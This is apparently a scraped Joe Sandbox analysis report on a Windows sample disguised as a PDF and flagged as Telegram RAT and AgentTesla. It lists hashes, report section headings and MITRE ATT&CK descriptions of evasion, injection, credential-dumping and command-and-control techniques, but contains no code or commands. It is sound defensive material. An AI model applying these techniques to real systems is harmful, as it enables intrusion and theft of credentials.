Opcode Fuzzy Hash: 760fb0fb418c4e7965702313efe8da5c2ebab69fdca7b20de656ac10f12ce82a
Instruction Fuzzy Hash: 5BF02B61B18C8A0BD68DF66850756F97391FFA434070441BBD00DD3587DE28FC0243C0

Function 00007FFD34977756 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab29bb5ed6a8ed67ba80e666421679f9b6d3b16fd1a3d62031705fdba3d43449
Instruction ID: 79f31853019ffe52294e6be700220b64054e35e9d6ab31a8024f7363defd07b4
Opcode Fuzzy Hash: ab29bb5ed6a8ed67ba80e666421679f9b6d3b16fd1a3d62031705fdba3d43449
Instruction Fuzzy Hash: B9E0C231F0C21919FB15A3B42CA22FCB741EF82224F0440BEE20DD01C3CC2D64129390

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1C24TBP_00000143.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
1C24TBP_00000143.pdf.exe

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre